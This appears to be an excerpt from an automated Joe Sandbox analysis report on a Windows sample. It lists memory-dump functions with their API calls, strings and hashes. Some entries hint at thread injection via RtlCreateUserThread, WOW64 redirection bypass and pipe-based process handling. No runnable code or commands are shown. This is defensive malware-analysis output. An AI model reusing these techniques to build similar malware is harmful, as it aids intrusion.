GetModuleHandleA.KERNEL32(ntdll.dll,RtlCreateUserThread,00000000,00000000,00000000,067654C2,?,?,?,?,?,?,?,00000000,?,067654C2), ref: 06765AF9
GetProcAddress.KERNEL32(00000000), ref: 06765B00

Strings

ntdll.dll, xrefs: 06765AF1
RtlCreateUserThread, xrefs: 06765AEA

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: RtlCreateUserThread$ntdll.dll
API String ID: 1646373207-2935400652
Opcode ID: 8b5f094766077cc470f5d9dfb346257a7633fe9316f67934c9cdfcfff8818090
Instruction ID: 0b1c6ad597eddfb8d0da7ad9e39e2410984663ea22ea97aaea26471e1a39b730
Opcode Fuzzy Hash: 8b5f094766077cc470f5d9dfb346257a7633fe9316f67934c9cdfcfff8818090
Instruction Fuzzy Hash: D4F01572E41218FFDB51EFA1CC0A8AF7F69EE04650B548459BA16A6000E6748A50EB91

Uniqueness

Uniqueness Score: -1.00%

Function 067685A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 067685A8
__snprintf.LIBCMT ref: 067685D8

Strings

%s&%s, xrefs: 067685EB
?%s, xrefs: 067685CF

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: __snprintf_memset
String ID: %s&%s$?%s
API String ID: 2657849664-1750478248
Opcode ID: 1f56a364f1df6a668078215448d490593e44d297f3689e9bbc488226ba417ac5
Instruction ID: b1f2920c2281786a0448dc0a6af0e7bfef68d1e0f7ddbed7b80552289f3148a7
Opcode Fuzzy Hash: 1f56a364f1df6a668078215448d490593e44d297f3689e9bbc488226ba417ac5
Instruction Fuzzy Hash: 2DF0A0B1558244BFE7D0EF04CC85E6B77ACEF85700F444459BE5546002E664E900C732

Uniqueness

Uniqueness Score: -1.00%

Function 06763912 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,06766E6F), ref: 06763924
GetProcAddress.KERNEL32(00000000), ref: 0676392B

Strings

kernel32, xrefs: 0676391F
IsWow64Process, xrefs: 0676391A

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsWow64Process$kernel32
API String ID: 1646373207-3789238822
Opcode ID: f1d54e8db4db1f6453bec0681e44ad61ca9201c2f012f8b3442618c3ee49d907
Instruction ID: 334c471aeb744b96aef4b881f5289cedb6bdff88c9f6eea4b40791f0ae8eeb81
Opcode Fuzzy Hash: f1d54e8db4db1f6453bec0681e44ad61ca9201c2f012f8b3442618c3ee49d907
Instruction Fuzzy Hash: 2EE0EC70A90309BFEB40EBB6DC0AA6E76A8AB4075DF904058B511E1141EFB4DF04DA11

Uniqueness

Uniqueness Score: -1.00%

Function 06764A19 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,?,0676314C,?,00000000,00000002), ref: 06764A26
GetProcAddress.KERNEL32(00000000), ref: 06764A2D

Strings

Wow64RevertWow64FsRedirection, xrefs: 06764A1C
kernel32, xrefs: 06764A21

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: Wow64RevertWow64FsRedirection$kernel32
API String ID: 1646373207-3900151262
Opcode ID: ffb091c2ca2e6a1358d797f6b57805019cdcd36559f5df3c5a7dd4c603c9fe3d
Instruction ID: 02b40f1a18f5d1cd2fc0a0e298aaac6aba2a0f67a963353decc41a3fbb2b9859
Opcode Fuzzy Hash: ffb091c2ca2e6a1358d797f6b57805019cdcd36559f5df3c5a7dd4c603c9fe3d
Instruction Fuzzy Hash: 2BC08CB1AC030C7FEA407BF2EC0981B3F5DEA41A417C0C028FA28C0002EF61CC00C666

Uniqueness

Uniqueness Score: -1.00%

Function 067649F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,?,0676312D,?), ref: 06764A01
GetProcAddress.KERNEL32(00000000), ref: 06764A08

Strings

kernel32, xrefs: 067649FC
Wow64DisableWow64FsRedirection, xrefs: 067649F7

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: Wow64DisableWow64FsRedirection$kernel32
API String ID: 1646373207-736604160
Opcode ID: 60eeca9c68ecc2022b3b134535a3d7f22c14dadf4d2b4a4ef0a686b94b709d9f
Instruction ID: aaa8b80ea4f63d6aef67dfff8ff0df5b5a49b2d79015ea43131ac6b80c2fb706
Opcode Fuzzy Hash: 60eeca9c68ecc2022b3b134535a3d7f22c14dadf4d2b4a4ef0a686b94b709d9f
Instruction Fuzzy Hash: E8C080706C030C7FDA407BF2DC098163B5DE945641BC0C014F614D1001DF61DC00C556

Uniqueness

Uniqueness Score: -1.00%

Function 06361DAF Relevance: 6.2, APIs: 4, Instructions: 169COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 06361DF0
__snprintf.LIBCMT ref: 06361E17

Part of subcall function 063676EB: _memset.LIBCMT ref: 0636770C

__snprintf.LIBCMT ref: 06361E5E
__snprintf.LIBCMT ref: 06361E75

Memory Dump Source

Source File: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Offset: 06360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6360000_2.jbxd

Yara matches

Similarity

API ID: __snprintf$_memset
String ID:
API String ID: 444161222-0
Opcode ID: 392fba3fb3d9d608cc926a53832d434791d2b063994b97974049bb4d13b2cc6d
Instruction ID: ef74e30a930a76425cff8e6381f4e0e547a80a1f20a7109b44a388c8a8b0630a
Opcode Fuzzy Hash: 392fba3fb3d9d608cc926a53832d434791d2b063994b97974049bb4d13b2cc6d
Instruction Fuzzy Hash: 30518D72D00118BFEF92AFA9DC84DEE7BBDEF09314F108465F624A6150D7309A09CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06764271 Relevance: 6.1, APIs: 4, Instructions: 143COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 06766F4C: _malloc.LIBCMT ref: 06766F52
Part of subcall function 06766F4C: _malloc.LIBCMT ref: 06766F62

Part of subcall function 067762E8: __fsopen.LIBCMT ref: 067762F5

_fseek.LIBCMT ref: 067642E7

Part of subcall function 06776922: __lock_file.LIBCMT ref: 06776931
Part of subcall function 06776922: __ftelli64_nolock.LIBCMT ref: 0677693E

_fseek.LIBCMT ref: 06764300

Part of subcall function 06776CB3: __lock_file.LIBCMT ref: 06776CFE
Part of subcall function 06776CB3: __fseek_nolock.LIBCMT ref: 06776D0E

GetFullPathNameA.KERNEL32(0678E70C,00000800,?,00000000,?,?,?,?,?,?,?,?,?,?,?,0676156B), ref: 0676432D
_malloc.LIBCMT ref: 06764347

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: _malloc$__lock_file_fseek$FullNamePath__fseek_nolock__fsopen__ftelli64_nolock
String ID:
API String ID: 73014519-0
Opcode ID: b5f993a589612a68adb12c5d06f48f669ff5ddffb8cddee76e9c95b287511ba1
Instruction ID: 06fd6a17d7c7d5087b8575e7a3f23c4eab8171b44e8fb2d4f4b322a661917ada
Opcode Fuzzy Hash: b5f993a589612a68adb12c5d06f48f669ff5ddffb8cddee76e9c95b287511ba1
Instruction Fuzzy Hash: D241B8B1C00204AFCFC0BBAADC89F9E7BF9AF04210F108125FA24B2195FA7599548B61

Uniqueness

Uniqueness Score: -1.00%

Function 067762FF Relevance: 6.1, APIs: 4, Instructions: 137COMMONLIBRARYCODE

Download Yara Rule

APIs

__flush.LIBCMT ref: 067763C3
__fileno.LIBCMT ref: 067763E3
__locking.LIBCMT ref: 067763EA
__flsbuf.LIBCMT ref: 06776415

Part of subcall function 0677747A: __getptd_noexit.LIBCMT ref: 0677747A

Part of subcall function 067795C5: __decode_pointer.LIBCMT ref: 067795D0

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
String ID:
API String ID: 3240763771-0
Opcode ID: f8710533abc2f5b3fb5f147849a2464613c1c5199b2b5e83875a7d4d8df38b9b
Instruction ID: 18ee3f8a8948ab9ffb6566c56a70944cf238f9cea5d3b3a11c151f7fe71162c1
Opcode Fuzzy Hash: f8710533abc2f5b3fb5f147849a2464613c1c5199b2b5e83875a7d4d8df38b9b
Instruction Fuzzy Hash: AB41D471E00F05EFDFA49F79C8945AEBBB6EF81360F288529D46597188E770DA41CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0676AD62 Relevance: 6.1, APIs: 4, Instructions: 115COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0676AD79

Part of subcall function 067758CD: __FF_MSGBANNER.LIBCMT ref: 067758F0
Part of subcall function 067758CD: __NMSG_WRITE.LIBCMT ref: 067758F7
Part of subcall function 067758CD: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,0677D8A9,00000000,00000001,00000000,?,0677766D,00000018,06790748,0000000C,067776FE), ref: 06775944

_memset.LIBCMT ref: 0676AD8A

Part of subcall function 0676BC8C: _malloc.LIBCMT ref: 0676BCB3
Part of subcall function 0676BC8C: _memset.LIBCMT ref: 0676BCE1

_memset.LIBCMT ref: 0676AE97

Part of subcall function 06767023: htons.WS2_32(?), ref: 0676703B

_malloc.LIBCMT ref: 0676AE13

Part of subcall function 0676BC8C: _realloc.LIBCMT ref: 0676BCC2

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: _malloc_memset$AllocateHeap_reallochtons
String ID:
API String ID: 1081130088-0
Opcode ID: b9185aeabd3d4cb4df245cadbaf1837a843d2a687ba0d3f787c8c46ecad33fdd
Instruction ID: 692835690b601aafe5453222127133214ad865131f3f1f76a49b4374463c9866
Opcode Fuzzy Hash: b9185aeabd3d4cb4df245cadbaf1837a843d2a687ba0d3f787c8c46ecad33fdd
Instruction Fuzzy Hash: EA3126728143002AD7A0EB66DC8AF67B3EDEF48B54F00441EFB64E7080EAA5E444C6B5

Uniqueness

Uniqueness Score: -1.00%

Function 0636A19F Relevance: 6.1, APIs: 4, Instructions: 115COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0636A1B6

Part of subcall function 06374D0A: __FF_MSGBANNER.LIBCMT ref: 06374D2D
Part of subcall function 06374D0A: __NMSG_WRITE.LIBCMT ref: 06374D34

_memset.LIBCMT ref: 0636A1C7
_malloc.LIBCMT ref: 0636A250
_memset.LIBCMT ref: 0636A2D4

Memory Dump Source

Source File: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Offset: 06360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6360000_2.jbxd

Yara matches

Similarity

API ID: _malloc_memset
String ID:
API String ID: 4137368368-0
Opcode ID: e95d45cf03e9dace8ee17f7f3b5eddb95500a42064f360721c05de80dc074fe9
Instruction ID: 49ee7fe35e982a6a24293c3565626dd6b774f18433fe57e20a9b9f049e5cfd45
Opcode Fuzzy Hash: e95d45cf03e9dace8ee17f7f3b5eddb95500a42064f360721c05de80dc074fe9
Instruction Fuzzy Hash: 613105328043046ED3A2FB669C85F67B3ECEF45B40F00882FF561E7185EAA5944482E6

Uniqueness

Uniqueness Score: -1.00%

Function 067661B0 Relevance: 6.1, APIs: 4, Instructions: 106sleepCOMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 067661CA
_memset.LIBCMT ref: 067661E2

Part of subcall function 06767023: htons.WS2_32(?), ref: 0676703B

Part of subcall function 0676610D: GetLastError.KERNEL32(00000000,00000000,?,0676626B,?), ref: 06766127

Sleep.KERNEL32(000001F4), ref: 06766275
GetLastError.KERNEL32 ref: 06766281

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: ErrorLast_memset$Sleephtons
String ID:
API String ID: 2264653377-0
Opcode ID: 92fcbfb0e9528e41b3ae91e7220210bd7a32acdd8602fa43a123d6d88c4de4d2
Instruction ID: b82f4e7b9621a60f6b50632131978527c39d7ecdf459d8dfa3aa375e486f7763
Opcode Fuzzy Hash: 92fcbfb0e9528e41b3ae91e7220210bd7a32acdd8602fa43a123d6d88c4de4d2
Instruction Fuzzy Hash: F5319472D0421D6EDF95EBA6DC45EEE77BCEF04254F540026FA64F6080EE359A088B61

Uniqueness

Uniqueness Score: -1.00%

Function 06780498 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 067804CC
__isleadbyte_l.LIBCMT ref: 06780500
MultiByteToWideChar.KERNEL32(488D10C4,00000009,00000000,53DC458D,0678E5C0,00000000,?,?,?,0676AB5C,00000000,0678E5C0,00000000), ref: 06780531
MultiByteToWideChar.KERNEL32(488D10C4,00000009,00000000,00000001,0678E5C0,00000000,?,?,?,0676AB5C,00000000,0678E5C0,00000000), ref: 0678059F

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: af065f1a6add9931d2586e258ddf4ea5d27dbadd3372d389545bcf11ad39292b
Instruction ID: 86516ff986cf8692203013f4c9297a72b8107574b95cba9df6a933ef3562d477
Opcode Fuzzy Hash: af065f1a6add9931d2586e258ddf4ea5d27dbadd3372d389545bcf11ad39292b
Instruction Fuzzy Hash: 9031B231A81245EFDBA0EF64C884DBE3BA5FF42320F158569E4698B191D730DD84CB61

Uniqueness

Uniqueness Score: -1.00%

Function 06764F57 Relevance: 6.1, APIs: 4, Instructions: 92sleeppipeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 06764F72
CreatePipe.KERNEL32(?,00000000,?,00100000,?,00000000), ref: 06764FA9
GetStartupInfoA.KERNEL32(?), ref: 06764FB3
Sleep.KERNEL32(00000064,?,?,?,?,?,00000000), ref: 06764FEF

Part of subcall function 06766165: GetTickCount.KERNEL32 ref: 06766177
Part of subcall function 06766165: GetTickCount.KERNEL32 ref: 067661A5

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: CountTick$CreateInfoPipeSleepStartup_memset
String ID:
API String ID: 2883758626-0
Opcode ID: cf20fa29cceb73a2434b28ac2e171fab4300efe7ea922cb8b19c2b1d2536312b
Instruction ID: afafc392d4e87146c043576f75dec39fdb627e50e6261a6037570e43fa73fe26
Opcode Fuzzy Hash: cf20fa29cceb73a2434b28ac2e171fab4300efe7ea922cb8b19c2b1d2536312b
Instruction Fuzzy Hash: 05314A72C0020CAFDF51EFA5CC49ADEBBB9EF08314F104125FA14B6150EB729A64DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06762FBD Relevance: 6.1, APIs: 4, Instructions: 72synchronizationpipeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 06762FD0
CreatePipe.KERNEL32(00000000,00000002,?,00100000,?,00000000,00002000), ref: 06763006
GetStartupInfoA.KERNEL32(?), ref: 06763010
WaitForSingleObject.KERNEL32(?,00002710,?,?,?,?,?,?,?,00000000,00002000), ref: 06763054

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: CreateInfoObjectPipeSingleStartupWait_memset
String ID:
API String ID: 468459245-0
Opcode ID: acfe608626e069a7f05947a5438f9b8af7839d739deb5671b083345565797605
Instruction ID: 507958221c2109cb2ef114212411edece71e1c313b661ae5760f19e62d745e83
Opcode Fuzzy Hash: acfe608626e069a7f05947a5438f9b8af7839d739deb5671b083345565797605
Instruction Fuzzy Hash: 8421E772D1051CBEDB11DFE9CD49ADEBBB9AF48310F20055AEA14F6140D7719A058BA2

Uniqueness

Uniqueness Score: -1.00%

Function 0676113A Relevance: 6.1, APIs: 4, Instructions: 71COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0676114F

Part of subcall function 067758CD: __FF_MSGBANNER.LIBCMT ref: 067758F0
Part of subcall function 067758CD: __NMSG_WRITE.LIBCMT ref: 067758F7
Part of subcall function 067758CD: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,0677D8A9,00000000,00000001,00000000,?,0677766D,00000018,06790748,0000000C,067776FE), ref: 06775944

Part of subcall function 067649B1: ExpandEnvironmentStringsA.KERNEL32(0676AFFC,00000000,00000000,06768ED8,00000100,?,0676AFD4,?,0676AFFC,00000100,?,?,?,?,?,06768ED8), ref: 067649C3

_memset.LIBCMT ref: 067611A4
_memset.LIBCMT ref: 067611B3
_memset.LIBCMT ref: 067611CA

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: _memset$AllocateEnvironmentExpandHeapStrings_malloc
String ID:
API String ID: 2041733451-0
Opcode ID: 696d4afef2591207e08765a5230dfa94264ec138d92a561298e6bf1b5d1f4305
Instruction ID: 4dd63c34d1152f3da61d27e5ea7d395f5bdc1d3d9bd0749afef643fa58a87c84
Opcode Fuzzy Hash: 696d4afef2591207e08765a5230dfa94264ec138d92a561298e6bf1b5d1f4305
Instruction Fuzzy Hash: 61115B31A10240BADB945B3A8C8CEB67BBEDF13154F904454FD6893242E222AD05C3E0

Uniqueness

Uniqueness Score: -1.00%

Function 06360577 Relevance: 6.1, APIs: 4, Instructions: 71COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0636058C

Part of subcall function 06374D0A: __FF_MSGBANNER.LIBCMT ref: 06374D2D
Part of subcall function 06374D0A: __NMSG_WRITE.LIBCMT ref: 06374D34

_memset.LIBCMT ref: 063605E1
_memset.LIBCMT ref: 063605F0
_memset.LIBCMT ref: 06360607

Memory Dump Source

Source File: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Offset: 06360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6360000_2.jbxd

Yara matches

Similarity

API ID: _memset$_malloc
String ID:
API String ID: 3506388080-0
Opcode ID: cbb59a0485ab383cf776bce1adb0dca5ef97c1db617738dd29db20958ba5a44c
Instruction ID: 6f1a5ca351d39e416b801425903a0672f07ca9252a2d3f86fb8f515b2f6411c8
Opcode Fuzzy Hash: cbb59a0485ab383cf776bce1adb0dca5ef97c1db617738dd29db20958ba5a44c
Instruction Fuzzy Hash: 23115B71D14245BEDBA55F368D81EB77BADDF03160F1040A5F668E3142E7229909C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 0676B1B3 Relevance: 6.1, APIs: 4, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0676B1D5
_strncpy.LIBCMT ref: 0676B1F5
_strtok.LIBCMT ref: 0676B20D
_strtok.LIBCMT ref: 0676B22D

Part of subcall function 06776EBD: __getptd.LIBCMT ref: 06776EDB

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: _strtok$__getptd_malloc_strncpy
String ID:
API String ID: 4272429445-0
Opcode ID: fe3117760f0d570de9d5eb8e3fb2d2d5cf92777b84f3a199b62cc72025727671
Instruction ID: 868d9aa3f04712a1ac83eb4ef1866a079266706f2421eff1d0dd177496d3773d
Opcode Fuzzy Hash: fe3117760f0d570de9d5eb8e3fb2d2d5cf92777b84f3a199b62cc72025727671
Instruction Fuzzy Hash: 83110631514245AFDB98DF25EC58A763BE6FB03764F008218FB25C7291EB729416CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0636A5F0 Relevance: 6.1, APIs: 4, Instructions: 68COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0636A612
_strncpy.LIBCMT ref: 0636A632
_strtok.LIBCMT ref: 0636A64A
_strtok.LIBCMT ref: 0636A66A

Part of subcall function 063762FA: __getptd.LIBCMT ref: 06376318

Memory Dump Source

Source File: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Offset: 06360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6360000_2.jbxd

Yara matches

Similarity

API ID: _strtok$__getptd_malloc_strncpy
String ID:
API String ID: 4272429445-0
Opcode ID: 3267caea10cd6831e3035c7a646b424a490899b19bada16c0031096b734d0b27
Instruction ID: 9c2a013868b70000801fe143a9a329b9a06e610712e32d4c7fc0a4bf654229ee
Opcode Fuzzy Hash: 3267caea10cd6831e3035c7a646b424a490899b19bada16c0031096b734d0b27
Instruction Fuzzy Hash: 46115931810221DFE79A9F29DC986623B98FB03364F008118F456CF6A6EF7AD449CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 0676AEA6 Relevance: 6.1, APIs: 4, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0676AF08
_memset.LIBCMT ref: 0676AF1C
_memset.LIBCMT ref: 0676AF2D
_memset.LIBCMT ref: 0676AF36

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
